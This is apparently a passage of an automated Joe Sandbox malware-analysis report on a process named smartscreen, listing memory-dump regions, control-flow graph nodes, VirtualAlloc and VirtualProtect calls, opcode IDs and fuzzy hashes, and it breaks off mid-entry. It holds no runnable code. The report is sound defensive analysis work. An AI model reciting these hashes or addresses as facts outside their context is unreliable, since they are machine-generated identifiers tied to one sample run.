                                                                                                      • Opcode Fuzzy Hash: 185870f866dba72ef698c496ca4866c4b0d4729b629c8123389b10ed4677fda7
                                                                                                      • Instruction Fuzzy Hash: 8AE0C071E0D41D8AEFF5DB4C9854AA9A3B1EB58311F1546E5D00DD2191DE346A818F01

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 20487 7ffd9b8931bd 20488 7ffd9b8931db VirtualAlloc 20487->20488 20489 7ffd9b893170 20487->20489 20491 7ffd9b8932f5 20488->20491 20483 7ffd9b8917ce 20484 7ffd9b8917dd VirtualProtect 20483->20484 20486 7ffd9b89191d 20484->20486
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qM_H
                                                                                                      • API String ID: 0-3483471439
                                                                                                      • Opcode ID: 14f4ddd5c4fd11ca4076a2f228c6282f4d063b3c02a5a31d81ca1552741f1645
                                                                                                      • Instruction ID: 126f6610e1233de52da9636bc3363d1ce31374455bd2776d2eb999426fb8832b
                                                                                                      • Opcode Fuzzy Hash: 14f4ddd5c4fd11ca4076a2f228c6282f4d063b3c02a5a31d81ca1552741f1645
                                                                                                      • Instruction Fuzzy Hash: 8843CD70A0995D8FEFA8EB58C8A5BA9B7B1FF58300F1442E9D01DD3295DE356A81CF40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: 650819304fe912f32fbdc20aba5aceabd262ff0899f23df04fd85c75422912b3
                                                                                                      • Instruction ID: b2d6e6e593e22d6a732c406438083ec67056859b58fcfb46bad081175ad47065
                                                                                                      • Opcode Fuzzy Hash: 650819304fe912f32fbdc20aba5aceabd262ff0899f23df04fd85c75422912b3
                                                                                                      • Instruction Fuzzy Hash: 8F223770E0461D8FCB59DFA8C495AECBBB1FF49300F14866AD419EB259DB34A981CF50

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 0b3091e0aa45cf87657f9ce020a74bba11f4c92eb8c418fed1a14c3a7bfa35df
                                                                                                      • Instruction ID: f4029d40e0cdc7d58ea230a93152aa7432af92b895a830ed8a0d485dbbf64bf2
                                                                                                      • Opcode Fuzzy Hash: 0b3091e0aa45cf87657f9ce020a74bba11f4c92eb8c418fed1a14c3a7bfa35df
                                                                                                      • Instruction Fuzzy Hash: 35F1CE70A1965D8FDBA8DF58C895BA8B7F1FB5C301F5546BAD00DE3291DA346A80CF40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0f579e79bc09e5c425bfb886dd7dde8d304a26d9f4b6371e2495f0a383c39fd2
                                                                                                      • Instruction ID: fa97679f632860436ec768c13888c19ab84e67401e28715b19436c4fdf277428
                                                                                                      • Opcode Fuzzy Hash: 0f579e79bc09e5c425bfb886dd7dde8d304a26d9f4b6371e2495f0a383c39fd2
                                                                                                      • Instruction Fuzzy Hash: 1E52CC70A09A1D8FDBA9DB58C8A5BA8B7B1FF58301F5005E9D41DD72A1DB34AE81CF40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 899 7ffd9b880da0-7ffd9b880db7 900 7ffd9b880dba-7ffd9b880df9 899->900 901 7ffd9b880db9 899->901 902 7ffd9b880e00-7ffd9b880eb7 call 7ffd9b8807d0 900->902 903 7ffd9b880dfb 900->903 901->900 916 7ffd9b880ecf-7ffd9b880fa8 902->916 917 7ffd9b880eb9-7ffd9b880ece 902->917 903->902 930 7ffd9b880fc0-7ffd9b880fe3 916->930 931 7ffd9b880faa-7ffd9b880fbe 916->931 917->916 934 7ffd9b880feb-7ffd9b8810dc 930->934 931->930
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 73e47b7343c01d4794e36ea10f6dba7d5378e04a57ba070495a295d280a5278a
                                                                                                      • Instruction ID: d03fa3a1db6f5606332417938f9ce2bd28668a424ef964b35cc8527630cb72c6
                                                                                                      • Opcode Fuzzy Hash: 73e47b7343c01d4794e36ea10f6dba7d5378e04a57ba070495a295d280a5278a
                                                                                                      • Instruction Fuzzy Hash: FCA1F0B1A19A4D8FEB9CDB68C8657A97FE1FF99304F4001BAD059D72E6CB782801C741

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 481 7ffd9b895f66-7ffd9b895f99 483 7ffd9b895fa3-7ffd9b895fbb 481->483 484 7ffd9b895fc6-7ffd9b895fcd 483->484 485 7ffd9b895fed-7ffd9b896783 484->485 486 7ffd9b895fcf-7ffd9b8966d7 484->486 485->484 486->484 493 7ffd9b8966dd-7ffd9b8966e7 486->493 493->484
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pR_H
                                                                                                      • API String ID: 0-2848657385
                                                                                                      • Opcode ID: 33e81571372aec7a0d6de3302f488060b565d3b647cbd7fe47bcbb094d845a5c
                                                                                                      • Instruction ID: 5fe478351e98a41153b26e39affb2637533ba1dfa8a3db43a388718d95c6936f
                                                                                                      • Opcode Fuzzy Hash: 33e81571372aec7a0d6de3302f488060b565d3b647cbd7fe47bcbb094d845a5c
                                                                                                      • Instruction Fuzzy Hash: 3011E974A0A61D8BDFA4DB58D8A47E8B7B1EB5C340F1141A9E00EE7295CE386B84CB40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 494 7ffd9b88ae5e-7ffd9b88ae72 495 7ffd9b88ae7c-7ffd9b88ae89 494->495 496 7ffd9b888ba8-7ffd9b888bfd 495->496 497 7ffd9b88ae8f-7ffd9b88aebf 495->497
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b886000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction ID: 6df856715308c673239cc98cae428bec99e0914610913189bdaad43121e0f012
                                                                                                      • Opcode Fuzzy Hash: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction Fuzzy Hash: 4A11CB70E0652E8FEBB4AB58D8597A9B6B0EF08301F1140F9D45DA2291DF781AC48F06

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 564 7ffd9b8917ce-7ffd9b8917db 565 7ffd9b8917e6-7ffd9b8917f7 564->565 566 7ffd9b8917dd-7ffd9b8917e5 564->566 567 7ffd9b8917f9-7ffd9b891801 565->567 568 7ffd9b891802-7ffd9b89191b VirtualProtect 565->568 566->565 567->568 573 7ffd9b89191d 568->573 574 7ffd9b891923-7ffd9b891973 568->574 573->574
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b891000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: bfc7496c6417f53d63062d4c8a7d9c76983b5daaced66d740fbddf647cd63bde
                                                                                                      • Instruction ID: 152f351721678993cb611684e995c66574586cf717f81540f9035762cb1f6162
                                                                                                      • Opcode Fuzzy Hash: bfc7496c6417f53d63062d4c8a7d9c76983b5daaced66d740fbddf647cd63bde
                                                                                                      • Instruction Fuzzy Hash: 0D515C70D0864D8FDF58DFA8C885AEDBBF1FB5A310F1042AAD449E3251DB74A885CB41

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 661 7ffd9b8931bd-7ffd9b8931d9 662 7ffd9b8931db-7ffd9b8932f3 VirtualAlloc 661->662 663 7ffd9b893170-7ffd9b8931ba 661->663 669 7ffd9b8932f5 662->669 670 7ffd9b8932fb-7ffd9b89335f 662->670 669->670
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B891000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B891000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b891000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 4ec547129fdbc1591c1e0c9345b2911beed2b69842718154546698332e62a6ae
                                                                                                      • Instruction ID: 09f871408e1dca1d24b26a27a431eb81fe0daa1343300bc1bacd86dcec2e6559
                                                                                                      • Opcode Fuzzy Hash: 4ec547129fdbc1591c1e0c9345b2911beed2b69842718154546698332e62a6ae
                                                                                                      • Instruction Fuzzy Hash: 09614D70908A5D8FDF98EF58C885BE9BBF1FB69310F1041AAD44DE3255DB31A985CB80

                                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2J_^
                                                                                                      • API String ID: 0-3080444488
                                                                                                      • Opcode ID: e82fc0436e393070d7553025ff4f23cf775b5c229355e3ffca2ac55850646822
                                                                                                      • Instruction ID: 5fa84b053f5da57d052f3faca96f2edda98aecf2167ecee6b8e8b2c49b68364c
                                                                                                      • Opcode Fuzzy Hash: e82fc0436e393070d7553025ff4f23cf775b5c229355e3ffca2ac55850646822
                                                                                                      • Instruction Fuzzy Hash: 95112732A081298FDB4AFF6CE8A59E977A0EF84318F0441B7D05DC7196DE345542C780

                                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: U
                                                                                                      • API String ID: 0-3372436214
                                                                                                      • Opcode ID: 3a34e82c8c0d40ded21904b9245055d8d82eb7804af7da2eee8a644c559377ee
                                                                                                      • Instruction ID: 0a9d4b36fc6777152c12ce5aea4dd61bef4d4316e8b5be73d7ecc4cb2c6d7876
                                                                                                      • Opcode Fuzzy Hash: 3a34e82c8c0d40ded21904b9245055d8d82eb7804af7da2eee8a644c559377ee
                                                                                                      • Instruction Fuzzy Hash: 6A116130918A4D8FCF85EF68C858AEA7BF0FF29305F0105AAD419C72A5D7349554CB80

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0c48393e7de69f0426f807ffe3b3db86c731af611d03ce8c4f4d8b1d23cb1d7
                                                                                                      • Instruction ID: f3197df96f999cf682a7a95c258d237bb2f208574bb516cac9b8bef3a4006b19
                                                                                                      • Opcode Fuzzy Hash: b0c48393e7de69f0426f807ffe3b3db86c731af611d03ce8c4f4d8b1d23cb1d7
                                                                                                      • Instruction Fuzzy Hash: 83F13FB1E1995D8FDB9CEB58C8A5BB8B7A1FF58300F4441BAD00DA3292DE346981CF41

                                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5ac56d86a93208df0e0ac914f3a40fb040c97e457b3308b44c4741903495852c
                                                                                                      • Instruction ID: 557fceea63507166370237547eeda6f9c2deda73e78b630886f9acbc575f3d1a
                                                                                                      • Opcode Fuzzy Hash: 5ac56d86a93208df0e0ac914f3a40fb040c97e457b3308b44c4741903495852c
                                                                                                      • Instruction Fuzzy Hash: AD518F30A09A4E9FCF84DF98D494AED7BF1FF58350F0501AAE419E7261D634E991CB80

                                                                                                      Control-flow Graph (image not reproduced; legend: Executed / Not Executed)
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2177a602174ebe0577c78416e8c37ba802e1cec214e245a75779e5cb35b168d2
                                                                                                      • Instruction ID: 5ccaab2147581ab969f327fbd7b698f97d1e56b407909db70576d56be03d41f6
                                                                                                      • Opcode Fuzzy Hash: 2177a602174ebe0577c78416e8c37ba802e1cec214e245a75779e5cb35b168d2
                                                                                                      • Instruction Fuzzy Hash: FE518370E09A4E8FEB65EF54C4A57B9B7A1FF59300F0145B6D01DD72AACE34A981CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ce6e0119060710ed7c0260c98ed32f7b073f50435e04f69232e9042cff07110
                                                                                                      • Instruction ID: 2de567669d28318ae0773660bb57c751db1a6ca920c85bace966911e8c1aaedd
                                                                                                      • Opcode Fuzzy Hash: 4ce6e0119060710ed7c0260c98ed32f7b073f50435e04f69232e9042cff07110
                                                                                                      • Instruction Fuzzy Hash: 3D114931F0951DDBDB28EB98D8986ECB7B1FB98314F11067BC019D32A6DE3469018B40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a1d57f6ecec417d26d2e86b27de59abf21e78be0bfba9e32efab9c3537e08a74
                                                                                                      • Instruction ID: ade94aabd71d86a7e39d6c3de2023b30fde20e6686bb971aa4b745a23ed6e490
                                                                                                      • Opcode Fuzzy Hash: a1d57f6ecec417d26d2e86b27de59abf21e78be0bfba9e32efab9c3537e08a74
                                                                                                      • Instruction Fuzzy Hash: 4E110635E1EA9E8FE7129F64CC212E97B71EF46710F0645B3C061DB1E2CA386609C791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2454a2a403851f4d5748c789541082e05e590de1f090baff668b4e9a160082c1
                                                                                                      • Instruction ID: 251ac682025014e03c6eb3dc909ae8d6f02505493e487ea79f45facc9f61802e
                                                                                                      • Opcode Fuzzy Hash: 2454a2a403851f4d5748c789541082e05e590de1f090baff668b4e9a160082c1
                                                                                                      • Instruction Fuzzy Hash: DE21BB30A09A1D8FCFA9DB18C895AA8B3B5FF58301F5141E9E01DD76A1CB34AA81CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 80b76d3345c47c1a99d5483515adab295f5e6128b297297f1d231252ac5c94fe
                                                                                                      • Instruction ID: 5a011d3bbbe4e9ad04fd537250e3f728d241a092a15d6c42ef43914e69ea977c
                                                                                                      • Opcode Fuzzy Hash: 80b76d3345c47c1a99d5483515adab295f5e6128b297297f1d231252ac5c94fe
                                                                                                      • Instruction Fuzzy Hash: 3A115A70908A8D8FDF85EF68C899AE97BF0FF28301F0102ABD818D31A1DB349544CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ea867b1ad5bf8d1763fbad644c7b38660b0dfba5d97436edec88bc2a56be795e
                                                                                                      • Instruction ID: d4b5949b493ad288d92fd16b904a1577821ad5a858090608dfd027c41421a7d1
                                                                                                      • Opcode Fuzzy Hash: ea867b1ad5bf8d1763fbad644c7b38660b0dfba5d97436edec88bc2a56be795e
                                                                                                      • Instruction Fuzzy Hash: A4014921E0E50D5FEB119B94D8212FD7FA4EF8A314F420272E008D22D6DF385105C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b880000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: de5727294e6bf23bcdef37d96830c8e8bc45e50333cdf4139ae54ecb2bc6e830
                                                                                                      • Instruction ID: b52885abce043745989a6b9127e06d4817ab884dcd761fe354d876d5ff3a79d5
                                                                                                      • Opcode Fuzzy Hash: de5727294e6bf23bcdef37d96830c8e8bc45e50333cdf4139ae54ecb2bc6e830
                                                                                                      • Instruction Fuzzy Hash: 2411E571E0E68E8FE7129F64CC211A97B71EF46700F0545B3D061DB1E2DA386619C791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0cb2a8e0551438ef2f81278b5fdc4d57dcec83fff195b7fc395140f3ad594744
                                                                                                      • Instruction ID: e712ead1aed95e022d18997c2b9309de66e74047e9d369ea4abeecd00ccea7ee
                                                                                                      • Opcode Fuzzy Hash: 0cb2a8e0551438ef2f81278b5fdc4d57dcec83fff195b7fc395140f3ad594744
                                                                                                      • Instruction Fuzzy Hash: F4112E3090968D8FDF85EF68C859AE97FF0FF29300F0501AAD458D71A1DB34A554CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e5f947c7d7952ff29004dcde9cccc2678e38c08305c67090c758f9a658e80f24
                                                                                                      • Instruction ID: 87f7bf09fd7b0dbeb0e79b1449ae85450496cbe6a8c3b18f064f993d2f43371b
                                                                                                      • Opcode Fuzzy Hash: e5f947c7d7952ff29004dcde9cccc2678e38c08305c67090c758f9a658e80f24
                                                                                                      • Instruction Fuzzy Hash: 01110370908A8D8FCB85EF68C858AE97BF0FF69301F0502ABE408D72A1D734D594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b895000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f66fcbddf926fea8ff7c002ab06eaab1409fcaa0231ede2bf89c167f778a2d7e
                                                                                                      • Instruction ID: fe899756287dd30ccb97d1e20a28c9d086d1d3087c249cf2c87733499590d13d
                                                                                                      • Opcode Fuzzy Hash: f66fcbddf926fea8ff7c002ab06eaab1409fcaa0231ede2bf89c167f778a2d7e
                                                                                                      • Instruction Fuzzy Hash: 16015634A1968D8FCF85EF18C892AD93BF0FF18344F0601AAE888C7261C734E951CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0ce011a26a64d77917425b3f590f8d733fb2a19e5539cb1ff34173390797290f
                                                                                                      • Instruction ID: 432441c256f716d5b27da0d373946c506e22604a8a381a1b9aac31025694259c
                                                                                                      • Opcode Fuzzy Hash: 0ce011a26a64d77917425b3f590f8d733fb2a19e5539cb1ff34173390797290f
                                                                                                      • Instruction Fuzzy Hash: 38014C30909A4D8FDF95EF68C859AEA7BF0FF69300F0506ABD418C71A2DB759554CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B88C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b88c000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ac6cf462e478ccc57c781ae994bedadb07cd439df8696de8401a3268b17f2f8d
                                                                                                      • Instruction ID: c11588fc3878e7ac8f349fdf49aa4fd6059e22207ad96d83b4f5a50c0fc1863c
                                                                                                      • Opcode Fuzzy Hash: ac6cf462e478ccc57c781ae994bedadb07cd439df8696de8401a3268b17f2f8d
                                                                                                      • Instruction Fuzzy Hash: 3C01B13195FBCD5FE752ABB448650E83FA0EF0A215F0641FAE459D70B3DA38564A8301
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 181afbf863999027eb5fcc6fa264da3a1e6f2d2f378bce64827ef12e926ef78f
                                                                                                      • Instruction ID: 3ebaf57a84ffd7a654b9d337433b9a74d85c17ca2df1ff4f5bb7c705b4b7992c
                                                                                                      • Opcode Fuzzy Hash: 181afbf863999027eb5fcc6fa264da3a1e6f2d2f378bce64827ef12e926ef78f
                                                                                                      • Instruction Fuzzy Hash: 6501407090968C8FCB45DF68C8599D97FB0FF59304F05419BE449C71A2DB349994CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 243b3e159c95310ef3958bfc9a9fdfa26dd684b8908689b3359a47f43195a2a5
                                                                                                      • Instruction ID: 6ada5915d43ede09fa036546091e9cd0f061ffb0402e826aa61d788c0539b28f
                                                                                                      • Opcode Fuzzy Hash: 243b3e159c95310ef3958bfc9a9fdfa26dd684b8908689b3359a47f43195a2a5
                                                                                                      • Instruction Fuzzy Hash: 41015E3090968D8FCF85DF68C854AAA7BF0FF69300F0506ABD418C71A2DB74DA54CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B8C7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b8c7000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
